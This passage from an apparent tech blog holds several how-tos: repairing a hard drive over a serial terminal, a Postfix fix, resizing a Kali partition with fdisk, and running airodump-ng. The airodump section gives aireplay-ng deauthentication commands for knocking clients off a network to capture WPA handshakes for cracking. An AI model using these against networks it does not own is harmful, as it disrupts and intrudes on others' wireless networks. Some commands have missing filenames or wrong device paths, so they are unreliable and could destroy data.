  • Choose 38400, 8, None, 1, None in the COM properties box.

You will need to connect 3 wires from the USB adapter to the HDD. The 4th is not used:

  • GREEN cable is RX on the USB -> connects to TX on HDD
  • WHITE cable is TX on the USB cable -> connects to RX on HDD
  • BLACK cable is the ground -> connects to the ground pin on HDD
  • You should connect the TX pin of the hard drive to the RX pin of the adapter, and the hard drive’s RX pin to the adapter’s TX pin.  This is the theory. In the real life it worked backwards for me.
  • Connect the 3 pins like this:














These pins are located next to the hard drive’s SATA connector.

If you can’t fit the pins on the HDD, strip the plastic shielding from the pins.













  • After inserting the pins, power on the PC or the external USB rack. The SATA cable should be disconnected from the HDD. Same for the external rack.


RX, TX and ground pins connected to the hdd
RX, TX and ground pins connected to the HDD












  • Download putty from their official site.
  • Open putty and make these settings. Make sure you are using the correct COM port number. Mine was COM8, but it might be different for you. Go to device manager to check the actual port number.
    • Baud 38400 
    • Data Bits 8 
    • Stop Bits  1 
    • Parity none 
    • Flow Control  none
































  • Hit save and open.
  • You should see a blank screen. Hit Ctrl+Z.
  • If you connected the pins correctly you should see a prompt like this:

 F3 T>

If not, you may have the TX & RX wires swapped.  Switch the green wire with the white one and try again

Go to Access Level 2 (type /2):

F3 T>/2 (enter)
F3 2>

Wait about 30 seconds, then spin down the motor:

F3 2>Z (enter)

  Spin Down Complete
    Elapsed Time 0.147 msecs
F3 2>

If you instead see a message similar to this:

LED: 000000CE  FAddr: 00280D4DThen you entered the commands too quickly after supplying power to the drive.

Poweroff the HDD, wait 30 seconds, then begin again.
If everything went smooth until this point, carefully remove the red postit that you placed between the PCB and the drive head contacts.

Tighten the all screws.  Then start the motor:

F3 2>U (enter)

Spin Up Complete
    Elapsed Time 7.093 secs
F3 2>

Next go to Level 1 (type /1):

F3 2>/1 (enter)

And do a S.M.A.R.T. erase (create S.M.A.R.T. sector):

F3 1>N1 (enter)

When the prompt comes back up, turn off power to the hard drive, wait a few seconds, then turn it back on.  Wait about 20 seconds, then finally do partition regeneration:

Note, the bellow command contains Zero, not o – as in order.

F3 T>m0,2,2,0,0,0,0,22 (enter)

After 15-30 seconds, you should see something like:

Max Wr Retries = 00, Max Rd Retries = 00, Max ECC T-Level = 14, Max Certify Rewrite Retries = 00C8

    User Partition Format 10% complete, Zone 00, Pass 00, LBA 00004339, ErrCode 00000080, Elapsed Time 0 mins 05 secs

    User Partition Format Successful – Elapsed Time 0 mins 05 secs

Do not turn off drive until you see this message.
Once seen, drive can be turned off.
Power down everything, place drive back into your computer, and confirm that it’s working.

Update the firmware to the latest version! Google is your friend.

You are welcome 🙂

Fixing Plesk Postix sending emails locally

I had this issue too. Any email being sent to my company domain was being sent locally. This is (I believe) because in Plesk (yes it’s a Plesk issue).

So basically it’s going oh is the registered user lets send any emails locally or something like that.

Anyway, I have had to fix this twice now and I did it by editing the /etc/postfix/ file and commenting out the lines that started with “virtual”.

How to increase the Kali Linux root partition

If you need to increase the Kali Linux root partition size, this might become difficult if you have another extended partition (like SWAP) right after your root partition ends.
First things first. If you are using VMware, edit the settings of the Kali virtual machine and expand the hard disk.
Power on the Kali virtual machine.

My problem:
/dev/sda1 30GB mounted on /
/dev/sda2 5GB extended partition mounted as SWAP

What I want to do is delete the SWAP partition, mark the space as unused and increase the / partition size and leave a couple of GB free to create another SWAP partition.

Using qparted will not work, because it will tell you that the (swap) partition is in use.
Commenting the swap partition in /etc/fstab will also not work. Also tried swapoff –all with the same result.

The fix:
root@kali:~# fdisk /dev/sda5 //the SWAP partition
use p to print the current partitions on that device.
use d to delete the partition
with w write the changes and reboot.

Use df -h to see if the SWAP is still there, or qparted if you want a GUI.

Resize the root partition by deleting it:

root@kali:~# fdisk /dev/sda

Command (m for help): p
Disk /dev/sda: 300 GiB, 322122547200 bytes, 629145600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xaaea4a6f

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 60262399 60260352 28.8G 83 Linux

Command (m for help): d //deletes the partition
Selected partition 1
Partition 1 has been deleted.

// recreate the partition starting from the first allocated cylinder (2048), the increase the size of the partition
Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 1
First sector (2048-629145599, default 2048): 2048
Last sector, +sectors or +size{K,M,G,T,P} (2048-629145599, default 629145599): +290G //extend the / partition to 290G

Created a new partition 1 of type ‘Linux’ and of size 290 GiB.

Command (m for help): a //mark the partition as bootable
Selected partition 1
The bootable flag on partition 1 is enabled now.

Command (m for help): p
Disk /dev/sda: 300 GiB, 322122547200 bytes, 629145600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xaaea4a6f

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 608176127 608174080 290G 83 Linux

Command (m for help): w //write the changes
The partition table has been altered.
Calling ioctl() to re-read partition table.
Re-reading the partition table failed.: Device or resource busy

The kernel still uses the old table. The new table will be used at the next reboot or after you run partprobe(8) or kpartx(8).

root@kali:~# reboot

After the reboot, issue the following command:

root@kali:~# resize2fs /dev/sda1
resize2fs 1.42.13 (17-May-2015)
Filesystem at /dev/sda1 is mounted on /; on-line resizing required
old_desc_blocks = 2, new_desc_blocks = 19
The filesystem on /dev/sda1 is now 76021760 (4k) blocks long.

Check with df -h if the partition scheme is ok.

root@kali:~# df -h
Filesystem Size Used Avail Use% Mounted on
udev 10M 0 10M 0% /dev
tmpfs 529M 7.9M 521M 2% /run
/dev/sda1 286G 9.5G 264G 4% /
tmpfs 1.3G 320K 1.3G 1% /dev/shm
tmpfs 5.0M 0 5.0M 0% /run/lock
tmpfs 1.3G 0 1.3G 0% /sys/fs/cgroup
tmpfs 265M 8.0K 265M 1% /run/user/133
tmpfs 265M 16K 265M 1% /run/user/0
tmpfs 1.3G 4.0K 1.3G 1% /var/lib/polkit-1/localauthority/90-mandatory.d
root@kali:~# resize2fs /dev/sda1

To create another SWAP partition, just use qparted and create the partition with the desired size.


How to run airodump-ng in background

airodump-ng is part of the aircrack-ng suite and is responsible for 802.11 (WLAN) raw frames capturing.
At some point you will need to run airodump-ng in background, which is kind of tricky, but I’ll show you how it’s done properly.

To be able to use airodump you will need to have a WLAN network card capable of functioning in monitor mode.

Monitor mode allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received from the wireless network.

Enable monitor mode:

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

Standard usage of airodump:

airodump-ng wlan0 // channel hopping (monitors all channels by hopping from one to another)
airodump-ng -c 6 wlan0 // monitors channel 6
airodump-ng -c 6 wlan0 -w capture // monitors channel 6 and writes the captured frames to capture.cap file

In Linux, the easiest way to run programs in the background is to use the “&”: &
my_command -options &

This, however, does not work correctly with airdoump and after some trial and error, the most stable way to run airodump-ng in the background is to put the commands in a script file and run the script with:

nohup ./ &

The script:
# run airodump-ng in the background in a stable way
airodump-ng -w capture wlan1 &

The problem with using nohup is that it generates a huge ./nohup.out file.
To fix this, add a cron entry that will clear ./nohup.out every minute:

crontab -e

And add the following line:

* * * * * > /path/to/nohup.out

The nohup file will be generated in the directory from where you started the airodump script.

Other useful commands for frame capturing the WPA handshake:
– Capture traffic of a specific BSSID (router/AP):

airodump-ng -c 7 --bssid 12:34:56:78:90:AB -w capture wlan0

//replace 7 with your channel and modify the MAC

– Deauthenticate all sessions of a WLAN with aireplay:

aireplay-ng -0 1 -a 12:34:56:78:90:AB wlan0

– Deauthenticate a client:

aireplay-ng -0 1 -a router_MAC -c client_MAC wlan1

– View hidden ESSID:

airodump-ng --essid-regex "<len " wlan1

Cracking the WPA handshakes is a different subject, but it can be done with aircrack-ng or ocl-hashcat (for GPUs with OpenCL or CUDA ).

More info:

Please make sure that you try this tutorial on WLANs or equipment that you own or have the right to crack or tamper with. Not following this advice will get you in legal issues.